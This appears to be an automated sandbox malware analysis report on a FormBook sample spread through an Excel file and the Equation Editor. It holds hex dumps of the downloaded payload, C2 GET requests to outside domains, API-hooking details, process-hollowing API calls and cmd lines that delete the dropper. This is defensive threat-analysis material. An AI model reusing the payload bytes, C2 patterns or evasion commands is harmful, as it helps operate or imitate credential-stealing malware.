04 6f 64 00 00 0a 03 28 12 00 00 2b 16 fe 01 2a 4a 02 7b 12 00 00 04 6f 31 00 00 0a 03 6f 76 00 00 0a 2a 4a 03 02 7b 13 00 00 04 6f
                                                                                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL_= @@ U@=O@B` H.text `.rsrcB@ @@.reloc`$@B=Hq+abdcefghijklmnprqstuvwzyx0123456789ABCDEFGHIJKLMNQPRTSVUWXYZ6(o*B(o&*2(t*(&*2to*F~~(**(*(((((o*&o*(*(*.r?p*6{b(^*o{a{c{boZ(^*.sop*oq*V{od(+*J{o1ov*J{o
                                                                                                                                                Nov 20, 2020 11:23:47.007766008 CET3INData Raw: 71 00 00 0a 28 5e 00 00 0a 2a 2e 73 33 00 00 06 80 14 00 00 04 2a 2e 73 38 00 00 06 80 16 00 00 04 2a 0a 03 2a 1e 02 7b 1a 00 00 04 2a 22 02 03 7d 1a 00 00 04 2a 1e 02 7b 1b 00 00 04 2a 22 02 03 7d 1b 00 00 04 2a 56 02 28 07 00 00 0a 02 03 28 40
                                                                                                                                                Data Ascii: q(^*.s3*.s8**{*"}*{*"}*V((@(B*Jo?{(^*RoA{oA*.s*o?**("+*o*.s*2o(*6{,(^*z|-(.o*6
                                                                                                                                                Nov 20, 2020 11:23:47.007797956 CET4INData Raw: 7d c8 00 00 04 2a 1e 02 7b c9 00 00 04 2a 22 02 03 7d c9 00 00 04 2a 1e 02 7b ca 00 00 04 2a 22 02 03 7d ca 00 00 04 2a 1e 02 7b cb 00 00 04 2a 22 02 03 7d cb 00 00 04 2a 1e 02 7b cc 00 00 04 2a 22 02 03 7d cc 00 00 04 2a 1e 02 7b cd 00 00 04 2a
                                                                                                                                                Data Ascii: }*{*"}*{*"}*{*"}*{*"}*{*"}*{*"}*{*"}*{*"}*0(rpo,(,o**0M((s&s
                                                                                                                                                Nov 20, 2020 11:23:47.007819891 CET6INData Raw: 09 06 fe 06 2e 00 00 06 73 3a 00 00 0a 6f 3b 00 00 0a 07 06 fe 06 2f 00 00 06 73 43 00 00 0a 28 09 00 00 2b 2a 00 00 00 13 30 02 00 28 00 00 00 0d 00 00 11 d0 03 00 00 1b 28 44 00 00 0a 28 29 00 00 0a 28 0a 00 00 2b 26 28 0b 00 00 2b 28 01 00 00
                                                                                                                                                Data Ascii: .s:o;/sC(+*0((D()(+&(+(+(*0(D()(+s/(+sFo,oG+2oHt(+,oI+oJoK-u,oQ(
                                                                                                                                                Nov 20, 2020 11:23:47.226994991 CET7INData Raw: 06 67 00 00 0a 73 68 00 00 0a 28 10 00 00 2b 28 11 00 00 2b 0c 08 6f 55 00 00 0a 28 56 00 00 0a 0d 02 7b 6a 00 00 0a 06 7b 62 00 00 0a 6f 50 00 00 0a 6f 57 00 00 0a 13 04 09 11 04 6f 58 00 00 0a 2c 1f 09 11 04 6f 59 00 00 0a 13 06 08 02 7b 6b 00
                                                                                                                                                Data Ascii: gsh(+(+oU(V{j{boPoWoX,oY{koT+d{lrp%{m.%{c{boZ%oUo%{j{boPoW(Ro_*06{od(r(+,
                                                                                                                                                Nov 20, 2020 11:23:47.227062941 CET9INData Raw: 39 67 04 00 00 07 6f a2 00 00 0a 13 08 00 2b 20 11 08 6f a3 00 00 0a 13 09 08 11 09 6f 57 00 00 0a 09 73 44 00 00 06 6f a4 00 00 0a 09 17 58 0d 11 08 6f 4b 00 00 0a 2d d7 de 0c 11 08 2c 07 11 08 6f 06 00 00 0a dc 08 7e a5 00 00 0a 25 2d 17 26 7e
                                                                                                                                                Data Ascii: 9go+ ooWsDoXoK-,o~%-&~s%(+~%-&~s%(+~%-&~s%(+~%-&~s%(+o8s
                                                                                                                                                Nov 20, 2020 11:23:47.227113008 CET10INData Raw: 0a 0c 07 28 1f 00 00 2b 06 fe 06 e0 00 00 0a 73 e1 00 00 0a 28 20 00 00 2b 28 21 00 00 2b 0d 03 13 04 2b 46 09 11 04 6f e2 00 00 0a 6f e3 00 00 0a 13 05 08 6f 31 00 00 0a 11 05 09 11 04 6f e2 00 00 0a 6f e4 00 00 0a 28 e5 00 00 0a 25 2d 0e 26 09
                                                                                                                                                Data Ascii: (+s( +(!++Fooo1oo(%-&ooo&Xo-o+joo+;oooo%-&~SoXo-o,ooK-
                                                                                                                                                Nov 20, 2020 11:23:47.227163076 CET11INData Raw: 25 00 00 2b 0c 7e ca 00 00 0a 0d 03 2d 03 14 2b 12 03 06 fe 06 08 01 00 0a 73 40 00 00 0a 28 26 00 00 2b 13 04 11 04 28 cf 00 00 0a 16 fe 01 2c 07 06 7b 07 01 00 0a 0d 12 02 28 02 01 00 0a 16 fe 01 2c 09 7e ca 00 00 0a 13 07 2b 36 12 02 28 03 01
                                                                                                                                                Data Ascii: %+~-+s@(&+(,{(,~+6(o,{(^,+~*0( oooooo*0'!o(ooso*0
                                                                                                                                                Nov 20, 2020 11:23:47.227211952 CET13INData Raw: 00 00 00 07 00 00 00 e8 00 00 00 0a 01 00 00 16 0a dd 2e 02 00 00 02 15 7d 46 01 00 0a 02 02 7b 4b 01 00 0a 75 1f 00 00 01 7d 4c 01 00 0a 02 14 7d 4d 01 00 0a 02 7b 4c 01 00 0a 14 fe 03 2c 79 02 73 2f 00 00 0a 7d 4d 01 00 0a 02 02 7b 4c 01 00 0a
                                                                                                                                                Data Ascii: .}F{Ku}L}M{L,ys/}M{Lo&}N+.{NoH}O{M{OoWo_}O{NoK-{Nu,o}N{P,=sQ%rYpoR%rpoS%oT}U}F
                                                                                                                                                Nov 20, 2020 11:23:47.227262020 CET14INData Raw: 00 0a 02 18 7d 6c 01 00 0a 17 0a de 07 02 28 84 01 00 0a dc 06 2a 00 00 41 1c 00 00 04 00 00 00 00 00 00 00 11 02 00 00 11 02 00 00 07 00 00 00 00 00 00 00 13 30 02 00 5b 00 00 00 2c 00 00 11 02 7b 6c 01 00 0a 1f fe 33 18 02 7b 6d 01 00 0a 28 47
                                                                                                                                                Data Ascii: }l(*A0[,{l3{m(G3}l+s{}{}q{}w{}s*0+-(soooo&*0.r1p(#o
                                                                                                                                                Nov 20, 2020 11:23:47.227308989 CET16INData Raw: a6 01 00 0a 02 14 7d cc 01 00 0a 16 0a dd 0a 01 00 00 02 02 7b cc 01 00 0a 6f 48 00 00 0a 7d cd 01 00 0a 02 28 2f 00 00 2b 7d ce 01 00 0a 02 02 7b cd 01 00 0a 6f 28 00 00 0a 7d cf 01 00 0a 02 02 7b cf 01 00 0a 1f 14 6f d0 01 00 0a 7d d1 01 00 0a
                                                                                                                                                Data Ascii: }{oH}(/+}{o(}{o}}8{{}{o}{{o}{{o{{oT}}}{X}{{i?


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                1192.168.2.224916691.195.241.13780C:\Windows\explorer.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                Nov 20, 2020 11:24:55.913090944 CET636OUTGET /kgw/?UL0tlN9h=3DxvAc+RnyJZYPd+jiD/A7jyp+1eDPaflq2WzCVhzhMiI/AcsKs8L0UbA7cJFll24IqQXw==&_L30=xTm4lrNPut HTTP/1.1
                                                                                                                                                Host: www.pestigenix.com
                                                                                                                                                Connection: close
                                                                                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                Data Ascii:
                                                                                                                                                Nov 20, 2020 11:24:55.956897974 CET637INHTTP/1.1 302 Found
                                                                                                                                                date: Fri, 20 Nov 2020 10:24:55 GMT
                                                                                                                                                content-type: text/html; charset=UTF-8
                                                                                                                                                content-length: 0
                                                                                                                                                x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_NAnNDwyJzoYm1RRySDngvvHUFtvgQ2obU/nMiHo+KjE4OG0hZk4DAqRZfsqVz6DfJjgTkeN2ab0W7fbLhn4rdw==
                                                                                                                                                expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                pragma: no-cache
                                                                                                                                                last-modified: Fri, 20 Nov 2020 10:24:55 GMT
                                                                                                                                                location: https://sedo.com/search/details/?partnerid=324561&language=it&domain=pestigenix.com&origin=sales_lander_1&utm_medium=Parking&utm_campaign=offerpage
                                                                                                                                                x-cache-miss-from: parking-787d9d44d9-l79rg
                                                                                                                                                server: NginX
                                                                                                                                                connection: close


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                2192.168.2.2249167180.215.92.8080C:\Windows\explorer.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                Nov 20, 2020 11:25:16.686966896 CET638OUTGET /kgw/?UL0tlN9h=3e4oHR0srMrz4pb/7ChAIv3inAbNRhZBDtLZ1SN+NiEwBpgcLnXYR/VVRXtAcpgPjhXSMA==&_L30=xTm4lrNPut HTTP/1.1
                                                                                                                                                Host: www.atlanticdentallab.com
                                                                                                                                                Connection: close
                                                                                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                Data Ascii:
                                                                                                                                                Nov 20, 2020 11:25:17.932526112 CET638INHTTP/1.1 302 Found
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Location: /waf_verify.htm
                                                                                                                                                Server: Nginx Microsoft-HTTPAPI/2.0
                                                                                                                                                X-Powered-By: Nginx
                                                                                                                                                Date: Fri, 20 Nov 2020 10:24:14 GMT
                                                                                                                                                Connection: close
                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                Data Ascii: 0


                                                                                                                                                Code Manipulations

                                                                                                                                                User Modules

                                                                                                                                                Hook Summary

                                                                                                                                                Function NameHook TypeActive in Processes
                                                                                                                                                PeekMessageAINLINEexplorer.exe
                                                                                                                                                PeekMessageWINLINEexplorer.exe
                                                                                                                                                GetMessageWINLINEexplorer.exe
                                                                                                                                                GetMessageAINLINEexplorer.exe

                                                                                                                                                Processes

                                                                                                                                                Process: explorer.exe, Module: USER32.dll
                                                                                                                                                Function NameHook TypeNew Data
                                                                                                                                                PeekMessageAINLINE0x48 0x8B 0xB8 0x8D 0xDE 0xE1
                                                                                                                                                PeekMessageWINLINE0x48 0x8B 0xB8 0x85 0x5E 0xE1
                                                                                                                                                GetMessageWINLINE0x48 0x8B 0xB8 0x85 0x5E 0xE1
                                                                                                                                                GetMessageAINLINE0x48 0x8B 0xB8 0x8D 0xDE 0xE1

                                                                                                                                                Statistics

                                                                                                                                                CPU Usage

                                                                                                                                                Click to jump to process

                                                                                                                                                Memory Usage

                                                                                                                                                Click to jump to process

                                                                                                                                                High Level Behavior Distribution

                                                                                                                                                Click to dive into process behavior distribution

                                                                                                                                                Behavior

                                                                                                                                                Click to jump to process

                                                                                                                                                System Behavior

                                                                                                                                                Analysis Process: EXCEL.EXE PID: 2300 Parent PID: 584

                                                                                                                                                General

                                                                                                                                                Start time:11:22:56
                                                                                                                                                Start date:20/11/2020
                                                                                                                                                Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                                                                                                                                Imagebase:0x13f650000
                                                                                                                                                File size:27641504 bytes
                                                                                                                                                MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high

                                                                                                                                                Chronological Activities

                                                                                                                                                Analysis Process: EQNEDT32.EXE PID: 2332 Parent PID: 584

                                                                                                                                                General

                                                                                                                                                Start time:11:23:16
                                                                                                                                                Start date:20/11/2020
                                                                                                                                                Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                                                                                                                                                Imagebase:0x400000
                                                                                                                                                File size:543304 bytes
                                                                                                                                                MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high

                                                                                                                                                Chronological Activities

                                                                                                                                                Analysis Process: vbc.exe PID: 2816 Parent PID: 2332

                                                                                                                                                General

                                                                                                                                                Start time:11:23:19
                                                                                                                                                Start date:20/11/2020
                                                                                                                                                Path:C:\Users\Public\vbc.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:'C:\Users\Public\vbc.exe'
                                                                                                                                                Imagebase:0xfe0000
                                                                                                                                                File size:599552 bytes
                                                                                                                                                MD5 hash:429BBA6DBE159C300679509BE3085665
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:.Net C# or VB.NET
                                                                                                                                                Yara matches:
                                                                                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.2192654886.00000000040A9000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.2192654886.00000000040A9000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.2192654886.00000000040A9000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000003.2185713552.0000000005083000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000003.2185713552.0000000005083000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000003.2185713552.0000000005083000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.2194941292.00000000050B3000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.2194941292.00000000050B3000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.2194941292.00000000050B3000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.2190181482.0000000000510000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.2190181482.0000000000510000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.2190181482.0000000000510000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                Antivirus matches:
                                                                                                                                                • Detection: 100%, Avira
                                                                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                                                                • Detection: 33%, ReversingLabs
                                                                                                                                                Reputation:low

                                                                                                                                                Chronological Activities

                                                                                                                                                Analysis Process: RegAsm.exe PID: 2884 Parent PID: 2816

                                                                                                                                                General

                                                                                                                                                Start time:11:23:24
                                                                                                                                                Start date:20/11/2020
                                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                Imagebase:0xaf0000
                                                                                                                                                File size:64672 bytes
                                                                                                                                                MD5 hash:ADF76F395D5A0ECBBF005390B73C3FD2
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:moderate

                                                                                                                                                Chronological Activities

                                                                                                                                                Analysis Process: RegAsm.exe PID: 2464 Parent PID: 2816

                                                                                                                                                General

                                                                                                                                                Start time:11:23:24
                                                                                                                                                Start date:20/11/2020
                                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                Imagebase:0xaf0000
                                                                                                                                                File size:64672 bytes
                                                                                                                                                MD5 hash:ADF76F395D5A0ECBBF005390B73C3FD2
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Yara matches:
                                                                                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.2219572651.0000000000A20000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.2219572651.0000000000A20000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.2219572651.0000000000A20000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.2216844899.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.2216844899.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.2216844899.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.2217232228.0000000000880000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.2217232228.0000000000880000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.2217232228.0000000000880000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                Reputation:moderate

                                                                                                                                                Chronological Activities

                                                                                                                                                Analysis Process: cmd.exe PID: 2468 Parent PID: 2816

                                                                                                                                                General

                                                                                                                                                Start time:11:23:26
                                                                                                                                                Start date:20/11/2020
                                                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:'C:\Windows\System32\cmd.exe' /C choice /C Y /N /D Y /T 3 & Del 'C:\Users\Public\vbc.exe'
                                                                                                                                                Imagebase:0x4a2b0000
                                                                                                                                                File size:302592 bytes
                                                                                                                                                MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high

                                                                                                                                                Chronological Activities

                                                                                                                                                Analysis Process: explorer.exe PID: 1388 Parent PID: 2464

                                                                                                                                                General

                                                                                                                                                Start time:11:23:27
                                                                                                                                                Start date:20/11/2020
                                                                                                                                                Path:C:\Windows\explorer.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:
                                                                                                                                                Imagebase:0xffca0000
                                                                                                                                                File size:3229696 bytes
                                                                                                                                                MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:moderate

                                                                                                                                                Chronological Activities

                                                                                                                                                Analysis Process: choice.exe PID: 2368 Parent PID: 2468

                                                                                                                                                General

                                                                                                                                                Start time:11:23:27
                                                                                                                                                Start date:20/11/2020
                                                                                                                                                Path:C:\Windows\SysWOW64\choice.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:choice /C Y /N /D Y /T 3
                                                                                                                                                Imagebase:0x970000
                                                                                                                                                File size:29696 bytes
                                                                                                                                                MD5 hash:11DDFBF834BB2C6F4D23297D80EE9E45
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:moderate

                                                                                                                                                Chronological Activities

                                                                                                                                                Analysis Process: NETSTAT.EXE PID: 2832 Parent PID: 1388

                                                                                                                                                General

                                                                                                                                                Start time:11:23:37
                                                                                                                                                Start date:20/11/2020
                                                                                                                                                Path:C:\Windows\SysWOW64\NETSTAT.EXE
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:C:\Windows\SysWOW64\NETSTAT.EXE
                                                                                                                                                Imagebase:0xff0000
                                                                                                                                                File size:27136 bytes
                                                                                                                                                MD5 hash:32297BB17E6EC700D0FC869F9ACAF561
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Yara matches:
                                                                                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.2385404408.0000000000510000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.2385404408.0000000000510000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.2385404408.0000000000510000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.2385365843.00000000003D0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.2385365843.00000000003D0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.2385365843.00000000003D0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.2385186068.0000000000080000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.2385186068.0000000000080000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.2385186068.0000000000080000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                Reputation:moderate

                                                                                                                                                Chronological Activities

                                                                                                                                                Analysis Process: cmd.exe PID: 2220 Parent PID: 2832

                                                                                                                                                General

                                                                                                                                                Start time:11:23:43
                                                                                                                                                Start date:20/11/2020
                                                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:/c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe'
                                                                                                                                                Imagebase:0x4ab10000
                                                                                                                                                File size:302592 bytes
                                                                                                                                                MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high

                                                                                                                                                Chronological Activities

                                                                                                                                                Disassembly

                                                                                                                                                Code Analysis

                                                                                                                                                Reset < >

                                                                                                                                                  Analysis Process: vbc.exe PID: 2816 Parent PID: 2332 vbc.exeCOMMON

                                                                                                                                                  Executed Functions

                                                                                                                                                  Function 002F01CB, Relevance: 517.4, Strings: 413, Instructions: 1134COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000004.00000002.2190144201.00000000002F0000.00000040.00000001.sdmp, Offset: 002F0000, based on PE: false
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Section$OpenView
                                                                                                                                                  • String ID: .dll$.dll$.dll$2.dl$2.dl$2.dl$2.dl$32.d$Begi$Clas$CoCr$CoIn$Cont$Cont$Crea$Crea$Crea$Cryp$Cryp$Cryp$Cryp$Cryp$Cryp$Cryp$Cryp$DefW$EndP$Ex$ExW$Expa$File$Fill$Find$Free$GetM$GetP$GetS$Hash$Inst$IsWo$KERNEL32.DLL$Key$Key$KeyP$LdrG$LdrL$Libr$Load$Load$Lock$Memo$Mess$Mess$Muta$NtAd$NtAl$NtCl$NtCo$NtCr$NtCr$NtCr$NtCr$NtCr$NtDe$NtEn$NtFr$NtGe$NtMa$NtOp$NtOp$NtOp$NtOp$NtOp$NtOp$NtPr$NtQu$NtQu$NtQu$NtQu$NtQu$NtRe$NtRe$NtRe$NtSe$NtSe$NtTe$NtWr$NtWr$Ole3$Para$Post$Priv$Proc$Quit$Rect$Regi$Reso$Reso$Reso$Reso$RtlC$RtlC$RtlC$RtlF$RtlS$RtlZ$Sect$Show$Size$Thre$Thre$Thre$Thre$Tran$User$User$W$W$Wind$ZwCr$ZwRo$ZwUn$\Kno$\Kno$\Kno$\Kno$\Kno$\Kno$\Kno$\Kno$\Kno$\Kno$\Ole$\adv$\ker$\ntd$\use$a$ad$ad$ad$adEx$adFi$adVi$age$ageB$aint$alMe$alue$ance$ansa$api3$aryA$ash$at$ateH$ateK$ateP$ath$cW$ce$cess$cess$ckTr$ctio$ctio$ddre$ddre$dll$dll$dll$dvap$eA$eFil$eNam$ePro$eUse$eUse$ead$ease$eate$eate$eate$eate$eate$eate$eate$ecti$ecti$eeVi$emor$en$en$enFi$enKe$enMu$enPr$enPr$enSe$erne$eroM$eryI$eryI$eryS$eryS$eryV$esTo$ess$et$etCu$etPr$ext$extW$ey$ey$fSec$hDat$i32.$iewO$ile$ileg$indo$ings$ion$ion$irtu$iteF$iteV$itia$iveK$just$ken$kernel32.dll$l$l$l$l$l32.$lMem$lMem$lMem$layE$le$le$le$le32$lenW$lize$ll$ll$ll$ll.d$llba$loca$ls32$ls32$ls32$ls32$ls32$ls\O$ls\a$ls\k$ls\n$ls\u$lstr$mInf$mInf$mapV$mati$mati$mbstowcs$memc$mems$mete$mory$mp$n$n$nPai$ndEn$ndow$nel3$nfor$nfor$nmen$nsac$nt$nt$ntin$o$oadD$oced$oces$oces$oces$oces$odul$ofRe$ombs$on$on$onFi$onPr$orma$orma$ory$ory$ory$ose$otec$ow$oxA$pVie$py$py$r32.$rPro$rThr$reat$reat$reat$rent$rmin$rocA$roce$roce$rren$rs$rtua$rtua$rtua$ry$rypt$s$s$sTok$sW$sW$sact$ser3$sour$ss$ss$ss$ss$ster$strlenuser32.dlladvapi32.dll$sume$tAcq$tCon$tCon$tCre$tCur$tDec$tDer$tDes$tDes$tHas$tRel$tStr$tTra$tVal$tVir$tant$tdll$teMu$tePr$teVi$teWi$texW$text$text$tion$tion$tion$tion$troy$troy$tual$ue$ueKe$uire$umer$urce$urce$urce$urce$ureA$viro$w64P$wOfS$wPro$wcsc$wcsc$wcsc$wcsl$wcst$wnDl$wnDl$wnDl$wnDl$wnDl$wnDl$wnDl$wnDl$wnDl$wnDl$xecu$y$y$y$yste$yste
                                                                                                                                                  • API String ID: 2380476227-789266925
                                                                                                                                                  • Opcode ID: 787866d0769b518b38cf3cef9c8e0732aeba9ebab195fb7289df72886f22b9db
                                                                                                                                                  • Instruction ID: ca2566cc86daa4ebc1bea7311a19f552cd15aca71fddd44853fb50e2e3b84beb
                                                                                                                                                  • Opcode Fuzzy Hash: 787866d0769b518b38cf3cef9c8e0732aeba9ebab195fb7289df72886f22b9db
                                                                                                                                                  • Instruction Fuzzy Hash: C8D2CFB1C1526C8ACF21DFA18D85BDEBBB8BF15740F1041EAD248AB216DB319B84CF55
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 002F1C09, Relevance: 16.7, APIs: 11, Instructions: 225nativethreadprocessCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,0800000C,00000000,00000000,?,?), ref: 002F1CB7
                                                                                                                                                  • NtQueryInformationProcess.NTDLL(?,00000000,?,00000018,00000000), ref: 002F1CDC
                                                                                                                                                  • NtReadVirtualMemory.NTDLL(?,?,?,00000004,00000000), ref: 002F1CF6
                                                                                                                                                  • NtCreateSection.NTDLL(?,000F001F,00000000,?,00000040,08000000,00000000), ref: 002F1D41
                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 002F1D66
                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 002F1DA9
